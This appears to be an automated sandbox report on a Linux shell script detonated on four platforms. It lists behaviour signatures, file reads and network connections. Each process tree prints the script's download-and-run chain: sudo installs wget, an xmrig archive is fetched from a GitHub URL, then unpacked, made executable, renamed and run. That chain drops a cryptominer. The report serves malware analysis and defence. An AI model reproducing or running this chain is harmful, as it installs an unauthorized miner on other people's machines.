Malware Analysis Report

2025-08-10 16:40

Sample ID 241030-qfed7avqfl
Target runnb.sh
SHA256 a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
Tags defense_evasion discovery privilege_escalation
Score 7/10

Analysis Overview

Threat Level: Shows suspicious behavior

The file runnb.sh shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery privilege_escalation

File and Directory Permissions Modification

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Reads CPU attributes

Reads runtime system information

Writes file to tmp directory

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 13:11

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:14

Platform

debian9-mipsel-20240611-en

Max time kernel

47s

Max time network

50s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.rI7jbi /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.dXYb6i /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.jERPhv /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.x7IX4P /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Xq4tlU /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.FgDUuY /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.VTey0i /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.vXs1CJ /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YZ-0000BY-Ui]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YZ-0000Bb-Ut]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67YZ-0000BY-Ui-D

/var/spool/exim4/input/1t67YZ-0000Bb-Ut-D

/var/spool/exim4/input/hdr.716

/var/spool/exim4/msglog/1t67YZ-0000Bb-Ut

/var/spool/exim4/msglog/1t67YZ-0000BY-Ui

/var/mail/user

/var/spool/exim4/input/1t67YZ-0000Bb-Ut-J

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:14

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

129s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.x5Ceos /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.XU2EzE /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.g2qIKQ /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.5txVqS /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.KPYsiF /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.OPXXkR /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.IwFAt3 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.bBFkPQ /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.wTi3lt /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.cB60Yr /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.T0df92 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.OIT8kE /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.HAHzxf /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.395Zj4 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.9QEbig /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.yEkgHf /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp
US 1.1.1.1:53 github.com udp
US 1.1.1.1:53 github.com udp

Files

/tmp/fileutl.message.5txVqS

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:15

Platform

debian9-armhf-20240611-en

Max time kernel

5s

Max time network

36s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /bin/mv N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.wVucC6 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.OQ1lwc /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.CECbQm /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.xyNGYm /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 github.com udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:14

Platform

debian9-mipsbe-20240611-en

Max time kernel

48s

Max time network

50s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.LnZFXF /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.8LbZSq /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Q3iYUI /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.eXG3n8 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.DhA2ig /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Ik8e1r /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.7ZewYI /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.aMQ4G4 /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YY-0000Bf-SA]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YY-0000Bc-TS]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67YY-0000Bf-SA-D

/var/spool/exim4/input/1t67YY-0000Bc-TS-D

/var/spool/exim4/input/hdr.723

/var/spool/exim4/msglog/1t67YY-0000Bf-SA

/var/spool/exim4/msglog/1t67YY-0000Bc-TS

/var/mail/user

/var/spool/exim4/input/1t67YY-0000Bf-SA-J

memory/765-1-0x7762b000-0x7763c050-memory.dmp